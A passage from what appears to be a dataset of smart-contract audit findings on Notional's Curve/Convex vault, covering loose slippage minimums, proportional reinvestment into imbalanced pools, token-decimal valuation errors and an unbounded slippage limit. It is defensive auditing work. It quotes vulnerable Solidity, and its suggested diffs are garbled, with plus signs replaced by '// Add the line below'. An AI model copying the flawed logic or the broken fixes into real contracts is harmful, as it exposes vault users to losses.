functions\\n`Curve2TokenConvexHelper.settleVaultEmergency`\\n`Curve2TokenConvexHelper.settleVaultEmergency` is called by `Curve2TokenConvexVault.settleVaultEmergency`\\nIn summary, the `Curve2TokenConvexHelper._executeSettlement` function is called during vault settlement.\\nAn important point to note here is that within the `Curve2TokenConvexHelper._executeSettlement` function, the `params.minPrimary` and `params.minSecondary` are automatically computed and overwritten by the `TwoTokenPoolUtils._getMinExitAmounts` function (Refer to Line 124 below). Therefore, if the caller attempts to define the `params.minPrimary` and `params.minSecondary`, they will be discarded and overwritten. The `params.minPrimary` and `params.minSecondary` is for slippage control when redeeming the Curve's LP tokens.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\nThe `TwoTokenPoolUtils._getMinExitAmounts` function calculates the minimum amount on the share of the pool with a small discount.\\nAssume a Curve Pool with the following configuration:\\nConsist of two tokens (DAI and USDC). DAI is primary token, USDC is secondary token.\\nPool holds 200 US Dollars worth of tokens (50 DAI and 150 USDC).\\nDAI <> USDC price is 1:1\\ntotalSupply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)\\nminPrimary = (50 DAI * 50 LP_TOKEN * 99.75% / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 50 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 24.9375 DAI\\n\\nminSecondary = same calculation = 74.8125 USDC\\n```\\n\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `24.9375 DAI` as `params.minPrimary` and `74.8125 USDC` as `params.minSecondary`.\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen settling the vault, it is possible to instruct the vault to redeem the Curve's LP tokens single-sided or proportionally. Settle vault functions will trigger a chain of functions that will eventually call the `Curve2TokenConvexHelper._unstakeAndExitPool` function that is responsible for redeeming the Curve's LP tokens.\\nWithin the `Curve2TokenConvexHelper._unstakeAndExitPool` function, if the `params.secondaryTradeParams.length` is zero, the redemption will be single-sided (refer to Line 242 below). Otherwise, the redemption will be executed proportionally (refer to Line 247 below). For a single-sided redemption, only the `params.minPrimary` will be used.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _unstakeAndExitPool(\\n Curve2TokenPoolContext memory poolContext,\\n ConvexStakingContext memory stakingContext,\\n uint256 poolClaim,\\n RedeemParams memory params\\n ) internal returns (uint256 primaryBalance, uint256 secondaryBalance) {\\n // Withdraw pool tokens back to the vault for redemption\\n bool success = stakingContext.rewardPool.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n if (!success) revert Errors.UnstakeFailed();\\n\\n if (params.secondaryTradeParams.length == 0) {\\n // Redeem single-sided\\n primaryBalance = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity_one_coin(\\n poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary\\n );\\n } else {\\n // Redeem proportionally\\n uint256[2] memory minAmounts;\\n minAmounts[poolContext.basePool.primaryIndex] = params.minPrimary;\\n minAmounts[poolContext.basePool.secondaryIndex] = params.minSecondary;\\n uint256[2] memory exitBalances = ICurve2TokenPool(address(poolContext.curvePool)).remove_liquidity(\\n poolClaim, minAmounts\\n );\\n\\n (primaryBalance, secondaryBalance) \\n = (exitBalances[poolContext.basePool.primaryIndex], exitBalances[poolContext.basePool.secondaryIndex]);\\n }\\n }\\n```\\n\\nAssume that the caller decided to perform a single-sided redemption of 50 LP Pool Tokens, using the earlier example. In this case,\\n`poolClaim` = 50 LP Pool Tokens\\n`params.minPrimary` = 24.9375 DAI\\n`params.minSecondary` = 74.8125 USDC\\nThe data passed into the `remove_liquidity_one_coin` will be as follows:\\n```\\n@notice Withdraw a single coin from the pool\\n@param _token_amount Amount of LP tokens to burn in the withdrawal\\n@param i Index value of the coin to withdraw\\n@param _min_amount Minimum amount of coin to receive\\n@return Amount of coin received\\ndef remove_liquidity_one_coin(\\n _token_amount: uint256,\\n i: int128,\\n _min_amount: uint256\\n) -> uint256:\\n```\\n\\n```\\nremove_liquidity_one_coin(poolClaim, int8(poolContext.basePool.primaryIndex), params.minPrimary);\\nremove_liquidity_one_coin(50 LP_TOKEN, Index 0=DAI, 24.9375 DAI);\\n```\\n\\nAssume the pool holds 200 US dollars worth of tokens (50 DAI and 150 USDC), and the total supply is 100 LP Tokens. The pool's state is imbalanced, so any trade will result in significant slippage.\\nIntuitively (ignoring the slippage & fee), redeeming 50 LP Tokens should return approximately 100 US dollars worth of tokens, which means around 100 DAI. Thus, the slippage or minimum amount should ideally be around 100 DAI (+/- 5%).\\nHowever, the trade will be executed in the above example even if the vault receives only 25 DAI because the `params.minPrimary` is set to `24.9375 DAI`. This could result in a loss of around 75 DAI due to slippage (about 75% slippage rate) in the worst-case scenario.","When performing a single-side redemption, avoid using the `TwoTokenPoolUtils._getMinExitAmounts` function to automatically compute the slippage or minimum amount of tokens to receive on behalf of the caller. Instead, give the caller the flexibility to define the slippage (params.minPrimary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a single-side trade (remove_liquidity_one_coin) is to call the Curve Pool's `calc_withdraw_one_coin` function off-chain to calculate the amount received when withdrawing a single LP Token, and then apply an acceptable discount.\\nNote that the `calc_withdraw_one_coin` function cannot be used solely on-chain for computing the minimum amount because the result can be manipulated since it uses spot balances for computation.","The slippage or minimum amount of tokens to be received is set to a value much smaller than expected. Thus, the vault will continue to redeem the pool tokens even if the trade incurs significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.","```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n" +Reinvest will return sub-optimal return if the pool is imbalanced,high,"Reinvesting only allows proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.\\nDuring reinvest rewards, the vault will ensure that the amount of primary and secondary tokens deposited is of the right proportion per the comment in Line 163 below.\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n\\nThe `Curve2TokenConvexHelper.reinvestReward` function will internally call the `Curve2TokenPoolUtils._checkPrimarySecondaryRatio`, which will check that the primary and secondary tokens deposited are of the right proportion.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n\\nThis concept of proportional join appears to be taken from the design of earlier Notional's Balancer leverage vaults. For Balancer Pools, it is recommended to join with all the pool's tokens in exact proportions to minimize the price impact of the join (Reference).\\nHowever, the concept of proportional join to minimize slippage does not always hold for Curve Pools as they operate differently.\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.","Consider removing the `_checkPrimarySecondaryRatio` function from the `_validateSpotPriceAndPairPrice` function to give the callers the option to deposit the reward tokens in a ""non-proportional"" manner if a Curve Pool becomes imbalanced so that the deposit penalty could be minimized or the deposit bonus can be exploited to increase the return.","There is no guarantee that a Curve Pool will always be balanced. Historically, there are multiple instances where the largest Curve pool (stETH/ETH) becomes imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the trade resulting in fewer tokens than possible due to the deposit penalty. In addition, the trade also misses out on the potential gain from the deposit bonus.\\nThe side-effect is that reinvesting the reward tokens will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.","```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n" +Curve vault will undervalue or overvalue the LP Pool tokens if it comprises tokens with different decimals,high,"A Curve vault that comprises tokens with different decimals will undervalue or overvalue the LP Pool tokens. As a result, users might be liquidated prematurely or be able to borrow more than they are allowed. Additionally, the vault settlement process might break.\\nThe `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function, which is utilized by the Curve vault, is used to compute the total value of the LP Pool tokens (poolClaim) denominated in the primary token.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n\\nIf a leverage vault supports a Curve Pool that contains two tokens with different decimals, the math within the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function would not work, and the value returned from it will be incorrect. Consider the following two scenarios:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is DAI.\\nDAI's decimals are 18, while USDC's decimals are 6.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 DAI and 100 USDC\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nThe `secondaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nNext, the code logic attempts to value the secondary balance (50 USDC) in terms of the primary token (DAI) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 USDC * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n```\\n\\n50 USDC should be worth 50 DAI (50 * 10^18). However, the `secondaryAmountInPrimary` shows that it is only worth 0.00000000005 DAI (50 * 10^6).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] * 10^18 / 10^18\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] // cancel out the 10^18\\nprimaryAmount = 50 DAI + 0.00000000005 DAI = 50.00000000005 DAI\\n```\\n\\n50 LP Pool tokens should be worth 100 DAI. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is only worth 50.00000000005 DAI, which undervalues the LP Pool tokens.\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is USDC.\\nUSDC's decimals are 6, while DAI's decimals are 18.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 USDC and 100 DAI\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nThe `secondaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nNext, the code logic attempts to value the secondary balance (50 DAI) in terms of the primary token (USDC) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 DAI * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n```\\n\\n50 DAI should be worth 50 USDC (50 * 10^6). However, the `secondaryAmountInPrimary` shows that it is worth 50,000,000,000,000 USDC (50 * 10^18).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] * 10^6 / 10^18\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] / 10^12\\nprimaryAmount = 50,000,000.00005 = 50 million\\n```\\n\\n50 LP Pool tokens should be worth 100 USDC. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is worth 50 million USDC, which overvalues the LP Pool tokens.\\nIn summary, if a leverage vault has two tokens with different decimals:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will undervalue the LP Pool tokens\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will overvalue the LP Pool tokens","When valuing the secondary balance in terms of the primary token using the oracle price, the result should be scaled up or down the decimals of the primary token accordingly if the decimals of the two tokens are different.\\nThe root cause of this issue is in the following portion of the code, which attempts to add the `primaryBalance` and `secondaryAmountInPrimary` before multiplying with the `primaryPrecision`. The `primaryBalance` and `secondaryAmountInPrimary` might not be denominated in the same decimals. Therefore, they cannot be added together without scaling them if the decimals of two tokens are different.\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n```\\n\\nConsider implementing the following changes to ensure that the math within the `_getTimeWeightedPrimaryBalance` function work with tokens with different decimals. The below approach will scale the secondary token to match the primary token's precision before performing further computation.\\n```\\nfunction _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n// Add the line below\\n // Scale secondary balance to primaryPrecision\\n// Add the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Add the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Add the line below\\n secondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\n \\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n \\n// Remove the line below\\n // Make sure primaryAmount is reported in primaryPrecision\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n primaryAmount = (primaryBalance // Add the line below\\n secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n// Add the line below\\n primaryAmount = primaryBalance // Add the line below\\n secondaryAmountInPrimary\\n}\\n```\\n\\nThe `poolContext.primaryBalance` or `poolClaim` are not scaled up to `strategyContext.poolClaimPrecision`. Thus, the `primaryBalance` is not scaled in any form. Thus, I do not see the need to perform any conversion at the last line of the `_getTimeWeightedPrimaryBalance` function.\\n```\\nuint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n```\\n\\nThe following attempts to run through the examples in the previous section showing that the updated function produces valid results after the changes.\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 DAI (18 Deci), Secondary Balance = 50 USDC (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDC * 10^18 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^18 / 10^6 = (50 * 10^18)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^18) + (50 * 10^18) = (100 * 10^18) = 100 DAI\\n```\\n\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 DAI (18 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 DAI * 10^6 / 10^18\\nsecondaryBalance = (50 * 10^18) * 10^6 / 10^18 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\nIf primary token's decimals (e.g. 6) == secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 USDT (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDT * 10^6 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^6 / 10^6 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\n`strategyContext.poolClaimPrecision` set to `CurveConstants.CURVE_PRECISION`, which is `1e18`. `oraclePrice` is always in `1e18` precision.","A vault supporting tokens with two different decimals will undervalue or overvalue the LP Pool tokens.\\nThe affected `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function is called within the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function that is used for valuing strategy tokens in terms of the primary balance. As a result, the strategy tokens will be overvalued or undervalued\\nFollowing are some of the impacts of this issue:\\nIf the strategy tokens are overvalued or undervalued, the users might be liquidated prematurely or be able to borrow more than they are allowed to since the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function is indirectly used for computing the collateral ratio of an account within Notional's `VaultConfiguration.calculateCollateralRatio` function.\\n`expectedUnderlyingRedeemed` is computed based on the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function. If the `expectedUnderlyingRedeemed` is incorrect, it will break the vault settlement process.","```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n" +`oracleSlippagePercentOrLimit` can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION`,medium,"Trade might be settled with a large slippage causing a loss of assets as the `oracleSlippagePercentOrLimit` limit is not bounded and can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION` threshold.\\nThe code at Line 73-75 only checks if the `oracleSlippagePercentOrLimit` is within the `Constants.SLIPPAGE_LIMIT_PRECISION` if `useDynamicSlippage` is `true`. If the trade is performed without dynamic slippage, the trade can be executed with an arbitrary limit.\\n```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n\\nThe `StrategyUtils._executeTradeExactIn` function is utilized by the Curve Vault.","Consider restricting the slippage limit when a trade is executed without dynamic slippage.\\n```\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n// Remove the line below\\n }\\n// Add the line below\\n } else {\\n// Add the line below\\n require(params.oracleSlippagePercentOrLimit != 0 && params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION_FOR_NON_DYNAMIC_TRADE);\\n// Add the line below\\n } \\n```\\n",Trade might be settled with a large slippage causing a loss of assets.,"```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == 